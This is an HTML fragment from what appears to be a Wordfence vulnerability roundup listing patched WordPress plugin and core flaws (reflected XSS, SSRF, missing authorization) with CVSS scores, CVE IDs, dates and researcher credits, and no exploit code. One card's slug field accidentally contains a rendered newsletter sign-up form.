<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87917" target="_blank" rel="noopener noreferrer">							CVE-2026-87917						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailchimp-for-wp" target="_blank" rel="noopener">MC4WP: Mailchimp for WordPress</a> <span class="wfvr-software-slug">[mailchimp-for-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nism0" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e24d8d2ef42b84d077066bb8e7c1419c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e24d8d2ef42b84d077066bb8e7c1419c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nism0" target="_blank" rel="noopener">nism0</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee4f837a-d0b5-48df-8c96-2a294985612e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44b3b015-2482-4b80-b208-73f1abe21b27" target="_blank" rel="noopener">Newsletter &lt;= 9.3.8 &#8211; Reflected Cross-Site Scripting via &#8216;nn&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90981" target="_blank" rel="noopener noreferrer">							CVE-2026-90981						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletter" target="_blank" rel="noopener">Newsletter – Send awesome emails from WordPress</a> <span class="wfvr-software-slug"><div class="tnp tnp-subscription ">
<form method="post" action="https://swiftupdates.ca/wp-admin/admin-ajax.php?action=tnp&amp;na=s">
<input type="hidden" name="nlang" value="">
<div class="tnp-field tnp-field-firstname"><label for="tnp-1">Name</label>
<input class="tnp-name" type="text" name="nn" id="tnp-1" value="" placeholder="" required></div>
<div class="tnp-field tnp-field-email"><label for="tnp-2">Email</label>
<input class="tnp-email" type="email" name="ne" id="tnp-2" value="" placeholder="" required></div>
<div class="tnp-field tnp-field-button" style="text-align: left"><input class="tnp-submit" type="submit" value="Subscribe" style="">
</div>
</form>
</div>
</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0f962dd7143eb1e6e46c9632a10cf4cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f962dd7143eb1e6e46c9632a10cf4cf"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">Yuto Hyakumoto</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/44b3b015-2482-4b80-b208-73f1abe21b27" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb138c9c-49c2-4534-bb37-ca163d035f46" target="_blank" rel="noopener">Pochipp &lt;= 1.20.2 &#8211; Reflected Cross-Site Scripting via &#8216;keyword&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92967" target="_blank" rel="noopener noreferrer">							CVE-2026-92967						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pochipp" target="_blank" rel="noopener">Pochipp</a> <span class="wfvr-software-slug">[pochipp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb138c9c-49c2-4534-bb37-ca163d035f46" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d623d4d6-2d76-4b4e-bd8b-69fe6ae352ca" target="_blank" rel="noopener">Qi Addons For Elementor &lt;= 1.11 &#8211; Reflected DOM-Based Cross-Site Scripting via &#8216;s&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92249" target="_blank" rel="noopener noreferrer">							CVE-2026-92249						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/qi-addons-for-elementor" target="_blank" rel="noopener">Qi Addons For Elementor</a> <span class="wfvr-software-slug">[qi-addons-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/eefe3705b8f48b48303d7a95fe7a0ec3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="eefe3705b8f48b48303d7a95fe7a0ec3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener">Adrien Brunner</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d623d4d6-2d76-4b4e-bd8b-69fe6ae352ca" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/34a38049-c512-4fed-8cd5-6efac4e29d20" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate &lt;= 5.4.1 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91014" target="_blank" rel="noopener noreferrer">							CVE-2026-91014						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-listing-realtyna-wpl" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate</a> <span class="wfvr-software-slug">[real-estate-listing-realtyna-wpl]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/34a38049-c512-4fed-8cd5-6efac4e29d20" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a60b55b-0c76-4b7c-9d16-a3cbd181eb3b" target="_blank" rel="noopener">ShopLentor &lt;= 3.5.1 &#8211; Reflected Cross-Site Scripting via Query-String Parameter Name</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92554" target="_blank" rel="noopener noreferrer">							CVE-2026-92554						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons" target="_blank" rel="noopener">ShopLentor – All-in-One WooCommerce Growth &amp; Store Enhancement Plugin</a> <span class="wfvr-software-slug">[woolentor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/67bc41ac47fddf33cd4e0ced70562b21.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="67bc41ac47fddf33cd4e0ced70562b21"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kuba" target="_blank" rel="noopener">Kuba</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a60b55b-0c76-4b7c-9d16-a3cbd181eb3b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e392d3c-4a3d-4b5b-a149-70c9b58dca1a" target="_blank" rel="noopener">SSL Zen &lt;= 4.7.42 &#8211; Reflected Cross-Site Scripting via &#8216;uri&#8217; and &#8216;host&#8217; Parameters</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15463" target="_blank" rel="noopener noreferrer">							CVE-2026-15463						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ssl-zen" target="_blank" rel="noopener">SSL Zen — SSL Certificate Installer &amp; HTTPS Redirects</a> <span class="wfvr-software-slug">[ssl-zen]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5e392d3c-4a3d-4b5b-a149-70c9b58dca1a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dcffa961-f670-494d-874c-50538038b915" target="_blank" rel="noopener">Tutor LMS &lt;= 4.0.8 &#8211; Reflected Cross-Site Scripting via &#8216;back_url&#8217; and &#8216;search&#8217; Parameters</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89081" target="_blank" rel="noopener noreferrer">							CVE-2026-89081						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/agentunio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/88e4afd96b32c7203b17e19cf81411f6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="88e4afd96b32c7203b17e19cf81411f6"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/agentunio" target="_blank" rel="noopener">Filip Kowalski (Agentunio)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dcffa961-f670-494d-874c-50538038b915" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0e0332d1-b83b-4347-95ef-3429de5a8cca" target="_blank" rel="noopener">WP Customer Reviews &lt;= 3.7.8 &#8211; Reflected Cross-Site Scripting via &#8216;wpcr3_fname&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11608" target="_blank" rel="noopener noreferrer">							CVE-2026-11608						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-customer-reviews" target="_blank" rel="noopener">WP Customer Reviews</a> <span class="wfvr-software-slug">[wp-customer-reviews]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quang-ha" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/58c83c2ee8fe4e2dcfc655549b98c0fb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="58c83c2ee8fe4e2dcfc655549b98c0fb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quang-ha" target="_blank" rel="noopener">Quang</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0e0332d1-b83b-4347-95ef-3429de5a8cca" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aaf9eb5b-4847-4cfc-9c5f-ec6c75271b68" target="_blank" rel="noopener">Import and export users and customers &lt;= 2.4.4 &#8211; Authenticated (Administrator+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">5.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16542" target="_blank" rel="noopener noreferrer">							CVE-2026-16542						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/import-users-from-csv-with-meta" target="_blank" rel="noopener">Import and export users and customers</a> <span class="wfvr-software-slug">[import-users-from-csv-with-meta]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/binesh-madharapu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fe579addc0911a2c540649603887f8b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fe579addc0911a2c540649603887f8b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/binesh-madharapu" target="_blank" rel="noopener">Binesh Madharapu</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/aaf9eb5b-4847-4cfc-9c5f-ec6c75271b68" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0705042b-c187-4886-90ca-3bf46910e239" target="_blank" rel="noopener">Import Export Lite &lt;= 3.9.32 &#8211; Authenticated (Administrator+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">5.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76559" target="_blank" rel="noopener noreferrer">							CVE-2026-76559						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">WP Import Export Lite</a> <span class="wfvr-software-slug">[wp-import-export-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yassin-mohamed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ce4cc1e08c1c7767526ccb8a686f2050.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ce4cc1e08c1c7767526ccb8a686f2050"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yassin-mohamed" target="_blank" rel="noopener">Yassin Mohamed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0705042b-c187-4886-90ca-3bf46910e239" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/28747e2e-9012-470c-a891-0fe97fd1ddba" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; Missing Authorization to customize_changeset Write via XML-RPC (Multisite/Custom Role edit_css Bypass)</a></h4>
<div class="cvss-score-badge">5.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.5 (Medium)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ben-bidner" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ben-bidner" target="_blank" rel="noopener">Ben Bidner</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/28747e2e-9012-470c-a891-0fe97fd1ddba" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df09d88a-2cda-4ab1-99a0-c54e98cf59e5" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia (Premium) &lt;= 2.4.4 &#8211; Authenticated (Custom+) Missing Authorization to Limited Account Takeover</a></h4>
<div class="cvss-score-badge">5.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14311" target="_blank" rel="noopener noreferrer">							CVE-2026-14311						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/df09d88a-2cda-4ab1-99a0-c54e98cf59e5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d4cc9537-879c-4c12-8b76-60241b7a3420" target="_blank" rel="noopener">Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors &lt;=  4.15.0 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via &#8216;profile_fields_user_email_value_prefix&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85657" target="_blank" rel="noopener noreferrer">							CVE-2026-85657						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/publishpress-authors" target="_blank" rel="noopener">Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors</a> <span class="wfvr-software-slug">[publishpress-authors]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
</p></div>
</p></div>
